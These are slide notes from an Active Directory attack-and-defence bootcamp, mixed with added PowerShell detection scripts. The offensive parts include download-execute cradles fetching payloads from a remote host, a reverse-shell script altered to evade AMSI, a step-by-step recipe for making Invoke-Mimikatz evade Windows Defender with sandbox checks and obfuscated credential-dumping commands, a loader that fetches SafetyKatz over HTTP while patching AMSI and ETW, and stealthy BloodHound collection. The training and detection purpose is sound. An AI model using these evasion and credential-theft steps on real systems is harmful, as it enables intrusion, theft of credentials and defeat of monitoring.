Attacking and Defending ActiveDirectory - SlideNotes

The document outlines a beginner-friendly bootcamp focused on attacking and defending Active Directory, led by Nikhil Mittal from Altered Security. It covers various modules including attack methodologies, privilege escalation, and bypassing defenses, emphasizing practical lab exercises without the use of exploits. The course aims to teach participants how to emulate adversarial techniques using built-in tools and functionality abuse within a controlled environment.

Attacking and Defending Active Directory

Beginner's Edition Bootcamp

Nikhil Mittal
Altered Security: https://alteredsecurity.com/

Attacking and Defending Active Directory - Beginner's Edition Bootcamp, AlteredSecurity 1
Join https://t.me/offenciveSec

About me

• Twitter - @nikhil_mitt
• Founder of Altered Security - alteredsecurity.com
• GitHub - github.com/samratashok
• Creator of Nishang, Deploy-Deception, RACE toolkit and more
• Interested in Active Directory, Offensive PowerShell and Azure security
• Previous Talks and/or Trainings
– DEF CON, BlackHat, BruCON and more.

Altered Security
• Trained more than 40000 security professionals from more than 130 countries!
• Our Red Team Labs Platform enables labs to be:
– Affordable
– Easy to Access
– Stable and provide great user experience
– Fun to Solve
– Big enough to feel enterprise-like
• Red team labs - alteredsecurity.com/online-labs
• Instructor-led bootcamps - alteredsecurity.com/bootcamps
• GitHub - github.com/AlteredSecurity
• Lab Platform - enterprisesecurity.io
• Free Labs and Challenges - redlabs.enterprisesecurity.io

Course Content
• Module 1
– Introduction to Active Directory and Attack Methodology
– Offensive PowerShell and .NET tradecraft
– Domain Enumeration
• Module 2
– Local Privilege Escalation
– Lateral Movement
– Domain Privilege Escalation
• Module 3
– Domain Persistence
– Cross Trust Attacks
• Module 4
– Bypassing Defenses (MDE and MDI)
– Monitoring and Detections

Goal

• The bootcamp is beginner friendly and assumes no previous experience with Active Directory security, although you are expected to understand the basics of Active Directory.
• This course introduces a concept, demonstrates how an attack can be executed and then has a Learning Objective section where students can practice in the lab.
• The lab, like a real-world red team operation, forces you to use built-in tools as long as possible and to focus on functionality abuse. So, in this course, we will NOT use any exploits or exploitation frameworks.
• We start from a foothold box as a normal domain user.
• Everything is not on the slides :)

Word of Caution
• In scope:
– 172.16.1.0/24 - 172.16.17.0/24
• Everything else is NOT in scope.
• Attacking out of scope machines (including fellow students' machines) may result in disqualification from the lab.
• Please do not try to access the internet from any lab machine.
• Please treat the lab network as a dangerous environment and take care of yourself!

Philosophy of the course
• We will emulate an adversary who has a foothold machine in the target domain.
• We will not use any exploit in the class and will solely depend on abuse of functionality and features which are rarely patched.
• We try to use the built-in tools and avoid touching disk on any target server as long as possible. We will not use any exploitation framework in the class.

Active Directory
• Directory Service used to manage Windows networks.
• Stores information about objects on the network and makes it easily available to users and admins.
• "Active Directory enables centralized, secure management of an entire network, which might span a building, a city or multiple locations throughout the world."

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc780036(v=ws.10)
https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview

Active Directory - Components
• Schema - Defines objects and their attributes.
• Query and index mechanism - Provides searching and publication of objects and their properties.
• Global Catalog - Contains information about every object in the directory.
• Replication Service - Distributes information across domain controllers.

Active Directory - Structure
• Forests, domains and organizational units (OUs) are the basic building blocks of any Active Directory structure.
• A forest - which is a security boundary - may contain multiple domains and each domain may contain multiple OUs.

https://learn.microsoft.com/en-us/powershell/scripting/overview

PowerShell Script Execution
• Download execute cradle

iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Check out Invoke-CradleCrafter: https://github.com/danielbohannon/Invoke-CradleCrafter

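Every cradle above pairs a fetch primitive (WebClient, iwr, a COM object, WebRequest) with in-memory execution (iex), and that pair is exactly what Script Block Logging records in Event ID 4104. The following PowerShell is an added example, not part of the course material: it flags such pairs in script block text. The function name, the pattern set and the sample blocks are my own, and the sample blocks are constructed.

```powershell
# Added example (not from the course slides): flag download-execute cradles in
# PowerShell Script Block Logging events (Event ID 4104, Microsoft-Windows-PowerShell/Operational).
# Function and pattern names are my own; the sample script blocks below are constructed.

function Find-DownloadCradle {
    [CmdletBinding()]
    param(
        # Script block text, e.g. the ScriptBlockText field of 4104 events
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$ScriptBlockText
    )
    begin {
        # Each cradle on the slide leaves a recognisable fetch primitive; the same block
        # usually also carries the in-memory execution primitive (iex / Invoke-Expression).
        $fetchPatterns = @{
            'WebClient.DownloadString' = 'Net\.WebClient.*DownloadString'
            'Invoke-WebRequest'        = '\b(iwr|Invoke-WebRequest|curl|wget)\b'
            'InternetExplorer COM'     = 'InternetExplorer\.Application.*\.navigate\('
            'Msxml2.XMLHTTP COM'       = 'Msxml2\.XMLHTTP.*\.open\('
            'WebRequest::Create'       = 'System\.NET\.WebRequest\]::Create'
        }
        $execPattern = '\b(iex|Invoke-Expression)\b'
    }
    process {
        foreach ($text in $ScriptBlockText) {
            $hasExec = $text -match $execPattern   # -match is case-insensitive by default
            foreach ($name in $fetchPatterns.Keys) {
                if ($text -match $fetchPatterns[$name]) {
                    [pscustomobject]@{
                        Cradle       = $name
                        InMemoryExec = $hasExec
                        Snippet      = $text.Substring(0, [Math]::Min(80, $text.Length))
                    }
                }
            }
        }
    }
}

# Constructed sample 4104 ScriptBlockText values: two cradles from the slide and one benign block.
$samples = @(
    'iex (New-Object Net.WebClient).DownloadString(''https://webserver/payload.ps1'')',
    '$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open(''GET'',''http://192.168.230.1/evil.ps1'',$false);$h.send();iex $h.responseText',
    'Get-ChildItem C:\Temp | Where-Object Length -gt 1MB'
)
$samples | Find-DownloadCradle | Format-Table -AutoSize

# Live hunt (requires Script Block Logging to be enabled and read access to the log).
# Properties[2] of a 4104 event is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object { $_.Properties[2].Value } | Find-DownloadCradle
```

The first two samples are reported with `InMemoryExec` true; the third produces nothing. Obfuscated cradles (the kind Invoke-CradleCrafter produces) defeat this string matching, which is why 4104 logging matters: the log captures the de-obfuscated block at execution time, so the patterns run against what actually executed rather than what was typed.
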
PowerShell Detections
• System-wide transcription
• Script Block logging
• AntiMalware Scan Interface (AMSI)
• Constrained Language Mode (CLM) - Integrated with AppLocker and WDAC (Device Guard)

15 ways to bypass PowerShell execution policy: https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy

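Before a control can be bypassed it has to be in effect, and a defender should know which of the four controls above actually are on a given host. The PowerShell below is an added example, not part of the course: it reads the Group Policy registry locations that PowerShell consults for transcription, script block and module logging, checks whether amsi.dll is loaded in the current process, and reports the session language mode. The function name is my own.

```powershell
# Added example (not from the course slides): report whether the PowerShell security controls
# listed above are in effect on this host. The registry paths are the Group Policy locations
# PowerShell reads; the function name is my own.

function Get-PowerShellSecurityPosture {
    [CmdletBinding()]
    param()

    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Read a policy value, treating a missing key or value as "not configured" (0)
    function Read-PolicyValue([string]$SubKey, [string]$Name) {
        $key = Join-Path $policyRoot $SubKey
        try { (Get-ItemProperty -Path $key -Name $Name -ErrorAction Stop).$Name }
        catch { 0 }
    }

    $scriptBlock   = Read-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging'
    $transcription = Read-PolicyValue 'Transcription'      'EnableTranscripting'
    $transcriptDir = Read-PolicyValue 'Transcription'      'OutputDirectory'
    $moduleLogging = Read-PolicyValue 'ModuleLogging'      'EnableModuleLogging'
    if ($transcriptDir -isnot [string]) { $transcriptDir = $null }

    # AMSI: amsi.dll is loaded into every PowerShell 5+ process while AMSI is active
    $amsiLoaded = [bool]((Get-Process -Id $PID).Modules | Where-Object ModuleName -eq 'amsi.dll')

    [pscustomobject]@{
        ScriptBlockLogging   = ($scriptBlock -eq 1)
        SystemWideTranscript = ($transcription -eq 1)
        TranscriptDirectory  = $transcriptDir
        ModuleLogging        = ($moduleLogging -eq 1)
        AmsiLoaded           = $amsiLoaded
        LanguageMode         = $ExecutionContext.SessionState.LanguageMode
        PowerShellVersion    = $PSVersionTable.PSVersion.ToString()
    }
}

$posture = Get-PowerShellSecurityPosture
$posture | Format-List

# Anything false here is a control an attacker on this host would not have to bypass.
if (-not $posture.ScriptBlockLogging) { Write-Warning 'Script Block Logging is not enforced by policy.' }
if (-not $posture.SystemWideTranscript) { Write-Warning 'System-wide transcription is not enforced by policy.' }
if ($posture.LanguageMode -ne 'ConstrainedLanguage') { Write-Warning "Session runs in $($posture.LanguageMode) mode." }
```

Two caveats: a false `ScriptBlockLogging` only means it is not forced by policy (PowerShell 5 still logs blocks it considers suspicious by default), and `LanguageMode` reflects this session, so run the check from the same kind of session users get, not from an administrator console that AppLocker or WDAC exempts.
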
PowerShell Tradecraft
• Offensive PowerShell is not dead.
• The detections depend on your target organization and whether you are using customized code.
• There are bypasses and then there are obfuscated bypasses!
• Remember, the focus of the class is Active Directory :)

Bypassing PowerShell Security
• We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for bypassing the security controls in PowerShell.
• The tool hooks the .NET assemblies (System.Management.Automation.dll and System.Core.dll) to bypass logging.
• It uses the CLR Profiler API to perform the hook.
• "A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time."

https://github.com/OmerYa/Invisi-Shell/blob/master/InvisiShellProfier/InvisiShellProfiler.cpp
https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview

Bypassing PowerShell Security
Using Invisi-Shell
• With admin privileges:
RunWithPathAsAdmin.bat
• With non-admin privileges:
RunWithRegistryNonAdmin.bat
• Type exit from the new PowerShell session to complete the clean-up.

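A CLR profiler is only loaded when the runtime finds a profiler registration in the process environment, and the launcher names above (path-based for admins, registry-based for non-admins) show where that registration is placed. The PowerShell below is an added example, not from the course or the Invisi-Shell project: it looks for the .NET Framework profiling variables (COR_ENABLE_PROFILING, COR_PROFILER, COR_PROFILER_PATH) and their .NET Core counterparts in the persistent user and machine environment keys and in the current process. The function name and output shape are my own.

```powershell
# Added example (not from the course slides or the Invisi-Shell project): look for CLR profiler
# registration that would let a DLL hook PowerShell's .NET assemblies. COR_* are the .NET
# Framework profiling variables, CORECLR_* the .NET Core ones; the registry keys checked are
# where persistent user and machine environment variables live. Function name is my own.

function Find-ClrProfilerRegistration {
    [CmdletBinding()]
    param()

    $names = 'COR_ENABLE_PROFILING', 'COR_PROFILER', 'COR_PROFILER_PATH',
             'CORECLR_ENABLE_PROFILING', 'CORECLR_PROFILER', 'CORECLR_PROFILER_PATH'

    $sources = @(
        @{ Scope = 'User registry';    Path = 'HKCU:\Environment' }
        @{ Scope = 'Machine registry'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' }
    )

    # Persistent variables: written to the registry, survive reboots, apply to every new process
    foreach ($src in $sources) {
        $props = Get-ItemProperty -Path $src.Path -ErrorAction SilentlyContinue
        foreach ($n in $names) {
            if ($props -and $props.PSObject.Properties[$n]) {
                [pscustomobject]@{ Scope = $src.Scope; Name = $n; Value = $props.$n }
            }
        }
    }

    # Variables already present in this process (inherited from a launcher such as a .bat file)
    foreach ($n in $names) {
        $v = [Environment]::GetEnvironmentVariable($n, 'Process')
        if ($v) { [pscustomobject]@{ Scope = 'Current process'; Name = $n; Value = $v } }
    }
}

$hits = @(Find-ClrProfilerRegistration)
if ($hits.Count -eq 0) {
    'No CLR profiler registration found.'
} else {
    # A profiler DLL outside a developer-tool install is worth an incident ticket; check the
    # DLL's Authenticode signature and publisher before deciding it is benign.
    $hits | Format-Table -AutoSize
}
```

For continuous coverage rather than a point-in-time check, the same signal is available from Sysmon Event ID 13 (registry value set) on the two environment keys above, and from process-creation telemetry that captures the environment block of new powershell.exe processes.
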
Bypassing AV Signatures for PowerShell
• We can always load scripts in memory and avoid detection using an AMSI bypass.
• How do we bypass signature based detection of on-disk PowerShell scripts by Windows Defender?
• We can use AMSITrigger (https://github.com/RythmStick/AMSITrigger) or DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary or script that Windows Defender may flag.
• Simply provide the path to the script file to scan it:

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1

• For full obfuscation of PowerShell scripts, see Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation). That is used for obfuscating the AMSI bypass in the course!

More on PowerShell obfuscation - https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Bypassing AV Signatures for PowerShell
• Steps to avoid signature based detection are pretty simple:
1) Scan using AMSITrigger
2) Modify the detected code snippet
3) Rescan using AMSITrigger
4) Repeat steps 2 & 3 till we get a result of "AMSI_RESULT_NOT_DETECTED" or "Blank"

Bypassing AV Signatures for PowerShell - Invoke-PowerShellTcp
• Scan using AMSITrigger

Bypassing AV Signatures for PowerShell - Invoke-PowerShellTcp
• Reverse the "Net.Sockets" string on line number 32

$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
if ($Reverse)
{
    $client = New-Object System.$class.TCPClient($IPAddress,$Port)
}

• Check again with AMSITrigger!

Bypassing AV Signatures for PowerShell - PowerUp - Script Modification
• Using only the minimal portion of a script is also useful.
• We can remove the part of a script that is getting detected but is not used.
• For this we can scan the script with DefenderCheck and then use the ByteToLineNumber.ps1 script in the C:\AD\Tools folder.

Bypassing AV Signatures for PowerShell - PowerUp - Script Modification
• Scan using DefenderCheck
• Here, we can see the detection part is at offset 0x1DCD2.
• We can find the line number of the detected part using the ByteToLineNumber.ps1 script.

Bypassing AV Signatures for PowerShell - PowerUp - Script Modification
• Running the script, we find the line number for the detected offset is 1984.

Bypassing AV Signatures for PowerShell - PowerUp - Script Modification
• Navigating to line 2640 in any text editor, we see that it is the start of a base64 encoded binary, which is getting detected.

Bypassing AV Signatures for PowerShell - PowerUp - Script Modification
• Scrolling up, we see the binary is used in the function "Write-ServiceBinary".
• We can delete the base64 encoded binary that is getting detected or remove the entire function.

Bypassing AV Signatures for PowerShell - PowerUp
• Check the script after removing the detected portion and it would be marked safe!

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
• Invoke-Mimikatz is THE most heavily signatured PowerShell script!
• We must rename it before scanning with AmsiTrigger or we get an access denied error.

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
• There are multiple detections. We need to make the following changes:
1. Remove default comments.
2. Rename the script, function names and variables.
3. Modify the variable names of the Win32 API calls that are detected.
4. Obfuscate PEBytes content → PowerKatz dll using packers.
5. Implement a reverse function for PEBytes to avoid any static signatures.
6. Add a sandbox check to waste dynamic analysis resources.
7. Remove Reflective PE warnings for a clean output.
8. Use obfuscated commands for Invoke-MimiEx execution.
9. Analysis using DefenderCheck.

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
1. Remove all default embedded comments such as follows:

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
2. Rename the script and the Invoke-Mimikatz function to Invoke-Mimi and replace variables such as DumpCreds with something like DC.

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
3. Modify the variable names of the Win32 API calls that are detected - "VirtualProtect", "WriteProcessMemory" and "CreateRemoteThread"

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
4. Even if all static signatures are avoided, PEBytes content (base64 encoded PowerKatz dll) is still detected by AMSI after execution. Rebuild a powerkatz dll from Mimikatz source and use ProtectMyTooling to obfuscate the powerkatz dll as shown.

ProtectMyTooling: https://github.com/mgeeky/ProtectMyTooling

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
5. Convert the powerkatz dll into base64, then reverse the string and use it as PEBytes64rev. Finally implement code to reverse this string for execution to bypass static detections.

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
6. Add a sandbox check to waste dynamic analysis resources and avoid detection after execution. We are targeting VMware and VirtualBox in the example.

$EvidenceOfSandbox = New-Object System.Collections.ArrayList

$FilePathsToCheck = 'C:\windows\System32\Drivers\Vmmouse.sys', 'C:\windows\System32\Drivers\vm3dgl.dll', 'C:\windows\System32\Drivers\vmdum.dll', 'C:\windows\System32\Drivers\vm3dver.dll', 'C:\windows\System32\Drivers\vmtray.dll', 'C:\windows\System32\Drivers\vmci.sys', 'C:\windows\System32\Drivers\vmusbmouse.sys', 'C:\windows\system32\Drivers\vmx_svga.sys', 'C:\windows\system32\Drivers\vmxnet.sys', 'C:\windows\System32\Drivers\VMToolsHook.dll', 'C:\windows\System32\Drivers\vmhgfs.dll', 'C:\windows\System32\Drivers\vmmousever.dll', 'C:\windows\System32\Drivers\vmGuestLib.dll', 'C:\windows\System32\Drivers\VmGuestLibJava.dll', 'C:\windows\System32\Drivers\vmscsi.sys', 'C:\windows\System32\Drivers\VBoxMouse.sys', 'C:\windows\System32\Drivers\VBoxGuest.sys', 'C:\windows\System32\Drivers\VBoxSF.sys', 'C:\windows\System32\Drivers\VBoxVideo.sys'

ForEach ($FilePath in $FilePathsToCheck) {
    if (Test-Path $FilePath) {
        [void]$EvidenceOfSandbox.Add($FilePath)
    }
}

if ($EvidenceOfSandbox.count -eq 0) {
    # no hypervisor artifacts found; the rest of the script continues here
} else {
    Write-Output "The following files on disk suggest we are running in a sandbox. Caution!"
    $EvidenceOfSandbox
}

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
7. Remove warnings for a clean output by deleting this line in the script:

Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue

• Next, remove IntPtr and other errors by adding:

$ErrorActionPreference = "SilentlyContinue"

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
8. For safe Invoke-MimiEx execution of a command such as sekurlsa::ekeys, append an obfuscated command to the end of the script as follows:

$j = "yS"
$i = "E"
$h = "k"
$g = "E"
$f = "::"
$e = "a"
$d = "lS"
$c = "r"
$b = "EKu"
$a = "s"

$Pwn = $a + $b + $c + $d + $e + $f + $g + $h + $i + $j

Invoke-Mimi -Command $Pwn

Bypassing AV Signatures for PowerShell - Invoke-Mimikatz
9. Finally, analyzing the scripts for any further detections we find that both Invoke-Mimi and Invoke-MimiEx now remain undetected.

C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\Invoke-Mimi.ps1
[+] No threat found in submitted file!

C:\AD\Tools\DefenderCheck> .\DefenderCheck.exe C:\AD\Tools\Invoke-MimiEx.ps1
[+] No threat found in submitted file!

Offensive .NET - Introduction
• Currently, .NET lacks some of the security features implemented in System.Management.Automation.dll.
• Because of this, many Red teams have included .NET in their tradecraft.
• There are many open source Offensive .NET tools and we will use the ones that fit our attack methodology.

A repo of popular Offensive C# tools - https://github.com/Flangvik/SharpCollection

Offensive .NET - Tradecraft
• When using .NET (or any other compiled language) there are some challenges:
– Detection by countermeasures like AV, EDR etc.
– Delivery of the payload (recall PowerShell's sweet download-execute cradles)
– Detection by logging like process creation logging, command line logging etc.
• We will try and address the AV detection and delivery of the payload as and when required during the class ;)
• You are on your own when the binaries that we share start getting detected by Windows Defender!

Offensive .NET - Tradecraft - AV bypass
• We will focus mostly on bypass of signature-based detection by Windows Defender.
• For that, we can use techniques like obfuscation, string manipulation etc.
• We can again use DefenderCheck to identify code and strings from a binary that Windows Defender may flag.
• This helps us in deciding on modifying the source code and minimal obfuscation.
• We can also use source code obfuscation.

Offensive .NET - Tradecraft - AV bypass - Source Code Obfuscation
• Tools such as Codecepticon (https://github.com/Accenture/Codecepticon) can also obfuscate the source code to bypass any signature-related detection.
• Codecepticon needs to be compiled in Visual Studio and its command line generator can help generate an obfuscation command quickly.

Offensive .NET - Tradecraft - AV bypass - Source Code Obfuscation
• Compile the project in Visual Studio and navigate to the output directory to open the CommandLineGenerator.html file.
• Here, you can decide how you want to obfuscate the source code.

Offensive .NET - Tradecraft - AV bypass - Source Code Obfuscation
• You can also use the following command to obfuscate the source code with Codecepticon:

C:\AD\Tools\Codecepticon.exe --action obfuscate --module csharp --verbose --path "C:\AD\Tools\Rubeus-master\Rubeus.sln" --map-file "C:\AD\Tools\Rubeus-master\Mapping.html" --profile rubeus --rename ncefpavs --rename-method markov --markov-min-length 3 --markov-max-length 10 --markov-min-words 3 --markov-max-words 5 --string-rewrite --string-rewrite-method xor

Offensive .NET - Tradecraft - AV bypass - Source Code Obfuscation
• With the command, Codecepticon will obfuscate everything in the .NET source code of the Rubeus project:

Offensive .NET - Tradecraft - AV bypass - Source Code Obfuscation
• If you now open up the project in Visual Studio, all the structs/enums/parameters/variables/etc. will have been renamed.

Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• A great tool to obfuscate the compiled binary is ConfuserEx (https://mkaring.github.io/ConfuserEx/)
• ConfuserEx is a free .NET obfuscator, which can stop AVs from performing signature based detection.

Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Run ConfuserEx GUI from the C:\AD\Tools directory.
• Add the Release folder of the compiled binary to ConfuserEx.

Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Download ConfuserEx GUI from the "Releases" page and simply run it.
• Add the Release folder of the compiled binary to ConfuserEx.

Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Add a new Rule in the settings page.
• Double click the rule and set the preset to "Maximum".

Offensive .NET - Tradecraft - AV bypass - ConfuserEx
• Finally, in the protect page, click "Protect" to produce the obfuscated binary.
• Verify with DefenderCheck.

Offensive .NET - Tradecraft - Payload Delivery
• We can use NetLoader (https://gist.github.com/Arno0x/2b223114a726be3c5e7a9cacd25053a2) to deliver our binary payloads.
• It can be used to load a binary from a file path or URL and patch AMSI & ETW while executing.

C:\Users\Public\Loader.exe -path http://172.16.100.X/SafetyKatz.exe

• We are using NetLoader with the CsWhispers project to add D/Invoke and indirect syscall execution, as NetLoader uses classic Process Injection WinAPIs which are flagged on basic import table analysis.

CsWhispers - https://github.com/rasta-mouse/CsWhispers
Original NetLoader - https://github.com/Flangvik/NetLoader

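The earlier tradecraft slide lists process creation and command line logging as the third challenge for compiled tooling, and the loader invocation above shows why: a binary started from C:\Users\Public with a URL as its argument is visible in Security Event ID 4688 (with command-line auditing enabled) or Sysmon Event ID 1 whatever the binary's signatures look like. The PowerShell below is an added example, not part of the course: it triages process-creation records on three cheap signals. The function name and the records are my own; the records are constructed in the shape of 4688 fields.

```powershell
# Added example (not from the course slides): triage process-creation records (Security 4688 with
# command-line auditing, or Sysmon Event ID 1) for loader-style launches such as the NetLoader
# command above. Function name and sample records are my own; the records are constructed.

function Test-SuspiciousProcessLaunch {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [pscustomobject]$Record     # expects NewProcessName and CommandLine properties
    )
    process {
        $reasons = @()
        # 1. Binary executed from a user-writable staging directory
        if ($Record.NewProcessName -match '^C:\\Users\\Public\\|\\AppData\\Local\\Temp\\|^C:\\Windows\\Temp\\') {
            $reasons += 'executed from user-writable path'
        }
        # 2. URL passed on the command line: fetch-and-run behaviour
        if ($Record.CommandLine -match 'https?://\S+') {
            $reasons += 'URL on command line'
        }
        # 3. Authenticode status of the image, when it is still on disk to be checked
        if (Test-Path -LiteralPath $Record.NewProcessName) {
            $sig = Get-AuthenticodeSignature -FilePath $Record.NewProcessName
            if ($sig.Status -ne 'Valid') { $reasons += "signature status $($sig.Status)" }
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Process     = $Record.NewProcessName
                CommandLine = $Record.CommandLine
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

# Constructed records in the shape of 4688 fields: the loader launch from the slide and a benign one
$records = @(
    [pscustomobject]@{ NewProcessName = 'C:\Users\Public\Loader.exe'
                       CommandLine    = 'C:\Users\Public\Loader.exe -path http://172.16.100.X/SafetyKatz.exe' }
    [pscustomobject]@{ NewProcessName = 'C:\Windows\System32\notepad.exe'
                       CommandLine    = 'notepad.exe C:\Users\alice\notes.txt' }
)
$records | Test-SuspiciousProcessLaunch | Format-List

# Live query. Needs "Audit Process Creation" and "Include command line in process creation events";
# in a 4688 event Properties[5] is NewProcessName and Properties[8] is CommandLine.
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | ForEach-Object {
#     [pscustomobject]@{ NewProcessName = $_.Properties[5].Value; CommandLine = $_.Properties[8].Value }
# } | Test-SuspiciousProcessLaunch
```

Only the first record is reported, with two reasons. None of the three signals depends on the binary's contents, which is the point: obfuscating the assembly (ConfuserEx, Nimcrypt2) changes what AV sees, not what process-creation auditing records.
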
Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
1. Download CsWhispers, open it in Visual Studio and check 'Allow unsafe code' under build configuration.
2. Create a new file called CsWhispers.txt under CsWhispers.Sample and append NT API and struct equivalents that are required to be replaced in the NetLoader project.
3. Finally, append the NetLoader project into CsWhispers.Sample and replace appropriate WinAPIs with their NT equivalents. Build the solution.
4. Obfuscate the generated assembly using Nimcrypt2.

Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
1. Download CsWhispers, open it in Visual Studio and check 'Allow unsafe code' under build configuration.

Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
2. Create a new file called CsWhispers.txt under CsWhispers.Sample and append NT API and struct equivalents that are required to be replaced in the NetLoader project.

Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
3. Finally, append the NetLoader project into CsWhispers.Sample and replace appropriate WinAPIs with their NT equivalents. An example replacement for the VirtualProtect WinAPI can be found below. Build the solution.

Offensive .NET - Tradecraft - Payload Delivery
Steps to use Loader with CsWhispers:
4. Obfuscate the generated assembly using Nimcrypt2.

kali> ./nimcrypt -f CSWhispers.Sample.exe -e -n -s --no-ppid-spoof -o Loader.exe -t csharp

-e: Encrypt strings using the strenc module
-n: Disable syscall name randomization
-s: Disable sandbox checks
--no-ppid-spoof: Disable PPID Spoofing
-t: Type of file
-o: Output filename

Methodology - Assume Breach

"It is more likely that an organization has already been compromised, but just hasn't discovered it yet."

Microsoft Cloud Red Teaming Paper: https://download.microsoft.com/download/C/1/9/C1990DBA-502F-4C2A-848D-392B93D9B9C3/Microsoft_Enterprise_Cloud_Red_Teaming.pdf

Methodology - Assume Breach
• Insider Attack Simulation is an important part of the Assume Breach Execution Cycle.
• In this class, we are going to use the Assume Breach Methodology on an Active Directory Environment and use the internal access available to an adversary to perform further attacks.

Attack Methodology

The Lab Environment
• The target Active Directory environment is of a fictional financial
services company called 'moneycorp'.
• Moneycorp has
− Fully patched Server 2022 machines with Windows Defender.
− Server 2016 Forest Functional Level.
− Multiple forests and multiple domains.
• Minimal firewall usage so that we focus more on concepts.
• Log on to https://adlab.enterprisesecurity.io to access the lab.

Domain Enumeration

Domain Enumeration
• For enumeration we can use the following tools:
− The ActiveDirectory PowerShell module (Microsoft signed, works even in PowerShell Constrained Language Mode)
  https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
  https://github.com/samratashok/ADModule

  Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
  Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

− BloodHound (C# and PowerShell collectors)
  https://github.com/BloodHoundAD/BloodHound

− PowerView (PowerShell)
  https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1

  . C:\AD\Tools\PowerView.ps1

− SharpView (C#) - does not support filtering using the pipeline
  https://github.com/tevora-threat/SharpView/

https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-without-installing-the-remote-server-tools/
https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html
https://www.netspi.com/blog/technical-blog/network-pentesting/powerhuntshares-2-0-release

Domain Enumeration - BloodHound
• Provides GUI for AD entities and relationships for the data collected by
its ingestors.
• Uses Graph Theory for providing the capability of mapping shortest path
for interesting things like Domain Admins.
• There are built-in queries for frequently used actions.
• Also supports custom Cypher queries.

Domain Enumeration - BloodHound
• There are two free versions of BloodHound:
1. BloodHound Legacy - https://github.com/BloodHoundAD/BloodHound
2. BloodHound CE (Community Edition) - https://github.com/SpecterOps/BloodHound

• BloodHound Legacy is present in the C:\AD\Tools directory of your student VM.

• You have read-only access to the pre-populated BloodHound CE instance at https://crtpbloodhound-altsecdashboard.msappproxy.net/
  Use the credentials for [email protected] from the lab portal - https://adlab.enterprisesecurity.io/
Domain Enumeration - BloodHound Legacy
• Supply data to BloodHound:
  C:\AD\Tools\Loader.exe -Path C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors\SharpHound.exe -args --collectionmethods All

• The gathered data can be uploaded to the BloodHound Legacy application.

Domain Enumeration - BloodHound CE
• Supply data to BloodHound:
  C:\AD\Tools\Loader.exe -Path C:\AD\Tools\Sharphound\SharpHound.exe -args --collectionmethods All

• The gathered data can be uploaded to BloodHound CE.

• Remember that you have read-only access to the shared web UI in the lab.

Domain Enumeration - BloodHound
• To make BloodHound collection stealthier, remove noisy collection methods like RDP, DCOM, PSRemote and LocalAdmin, which need a connection to every computer in the domain.
• Use --excludedcs so the collector never touches the domain controllers, which is what MDI watches most closely:
